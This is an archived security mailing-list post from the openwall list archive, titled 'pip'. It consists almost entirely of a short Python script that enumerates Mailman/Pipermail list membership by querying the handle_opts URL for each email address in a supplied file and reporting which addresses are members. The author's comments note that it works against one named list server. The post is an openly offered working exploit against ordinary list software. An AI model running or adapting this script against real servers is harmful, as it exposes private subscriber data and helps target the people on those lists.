lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
From: trippz at overflow.org (huw)
Subject: pip

# life's a garden, dig it.
# works on lists.netsys.com, doesn't on lists.immunitysec.com
# spose they fixed it!
import sys,urllib
if len(sys.argv) < 4:
        print "pipermail enumeration"
        print "./pip <host> <list of emails> <name of list>"
        sys.exit(0)
host = sys.argv[1]
list = sys.argv[3]
emails = open(sys.argv[2],"r").read().split('\n')
for t in emails:
        member = 0
        # print t
        req = "http://%s/mailman/handle_opts/%s/" % (host,list)
        req += t
        sent = urllib.urlopen(req)
        data = sent.read().split('\n')
        for r in data:
                if r.find(t) != -1:
                        member += 1
        if member == 0:
                print "%s is a member!" % t
        else:
                print "%s is NOT a member" % t



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ